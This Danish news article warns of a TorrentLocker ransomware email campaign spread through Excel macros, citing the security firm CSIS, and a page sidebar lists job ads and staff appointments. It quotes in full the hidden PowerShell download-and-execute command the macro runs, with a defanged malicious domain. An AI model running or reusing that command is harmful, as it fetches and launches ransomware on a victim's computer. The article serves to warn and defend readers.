Danmark ramt af nyt ransomware-angreb: Du skal ikke åbne denne mail

Danmark rammes i disse dage af en bølge af ondsindet ransomware, der kan låse din computers filer.

Artikel top billede

Danmark er mål for endnu en spamkampagne fra it-kriminelle, der bærer en ransomware i Torrentlocker-familien.

Det skriver sikkerhedsfirmaet CSIS i en sikkerhedsadvarsel.

Den ondsindede email ligner de fleste andre spam-emails for tiden med en tilsyneladende personlig besked på dansk og et tilknyttet Excel-dokument.

Hvis denne fil åbnes af en uforsigtig modtager og får en tilknyttet makrokode aktiveret ved at slå Excels beskyttelsestilstand fra, vil brugeren ende med en krypteret computer.

Du kan se et eksempel på mailen i toppen af artiklen. 

Aktiveres automatisk 

Makrokoden henter automatisk selve ransomware-programmet ned fra et ondsindet domæne, der via Windows' powershell-framework henter ransomware i Torrentlocker-klassen ned og afvikler programmet.

Det vil resultere i en låst computer og formodentligt et krav om en løsesum.

Funktionen ses udført via følgende powershell i en sikret form fra CSIS:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHELl.exE -ExeCuTiONPoliCY BYpaSS -nOProfilE -WIndoWsTyle hiddeN (nEw-objeCT SySTEM.NET.WeBcLIeNt).dOWnLoadFIle('http://ltmp.applepice[.]pl/file/set.rte','C:\Users\[%brugerkonto%]\AppData\Roaming.eXE');staRT-PrOcESS 'C:\Users\[%brugerkonto%]\AppData\Roaming.EXe'

Alle bør derfor være opmærksomme, hvis de modtager en mail med et enkeltstående xls-dokument, der ikke giver mening, og særligt hvis det kommer fra en ukendt email-adresse.

Angrebet minder i høj grad som et lignende angreb fra sidste uge, hvor ransomwaren blev aktiveret af en vedhæftet zip-fil.

Det fik i sidste uge CSIS til at højne sin trusselvurdering til 4 ud af 5.  

Læs også: Sikkerhedsfirma advarer: Målrettet ransomware-kampagne skyller ind over Danmark

Læses lige nu

    Rambøll Management Consulting

    Senior AI Engineer

    Midtjylland

    Capgemini Danmark A/S

    Client Partner

    Københavnsområdet

    Politiets Efterretningstjeneste

    IT-løsningsarkitekt i PET

    Københavnsområdet

    Navnenyt fra it-Danmark

    Norriq Danmark A/S har pr. 1. januar 2026 ansat Caroline Nolsø Tofft som Senior Advisor, Data & AI. Hun skal især beskæftige sig med at styrke vores kommercielle pipeline og relationen til både nye og eksisterende kunder. Hun kommer fra en stilling som Integration Partner Manager hos DataLøn. Nyt job

    Caroline Nolsø Tofft

    Norriq Danmark A/S

    Norriq Danmark A/S har pr. 1. januar 2026 ansat Christoffer Andersen som Sales Manager ERP. Han skal især beskæftige sig med fokus på at skalere ERP-salget og videreudvikle teamet i Valby så vi fortsat understøtter og opbygger stærke kunderelationer. Han kommer fra en stilling som Senior Key Account Manager hos NNIT A/S. Han er uddannet hos Aalborg Universitet som IT Management. Han har tidligere beskæftiget sig med Kommercielt ansvarlig for nogle af NNIT’s største strategiske enterprise-kunder. Nyt job

    Christoffer Andersen

    Norriq Danmark A/S

    Norriq Danmark A/S har pr. 2. februar 2026 ansat Andreas Dyngberg Pedersen som Solution Architect. Han skal især beskæftige sig med at sætte de overordnede rammer for leverancerne med afsæt i best practice og skalerbarhed. Han kommer fra en stilling som Solution Architect hos Impact commerce. Han er uddannet Hos EUC Syd som Datatekniker og Programmering. Nyt job

    Andreas Dyngberg Pedersen

    Norriq Danmark A/S

    Norriq Danmark A/S har pr. 2. februar 2026 ansat Vlad-Andrei Fagarasan som Solution Architect. Han skal især beskæftige sig med moderne dataplatforme og arkitekturer hvilket er med til at sikre at vi fortsat tilbyder vores kunder skræddersyede løsninger. Han har tidligere beskæftiget sig med BI- og dataprojekter i både privat og offentlig regi. Nyt job

    Vlad-Andrei Fagarasan

    Norriq Danmark A/S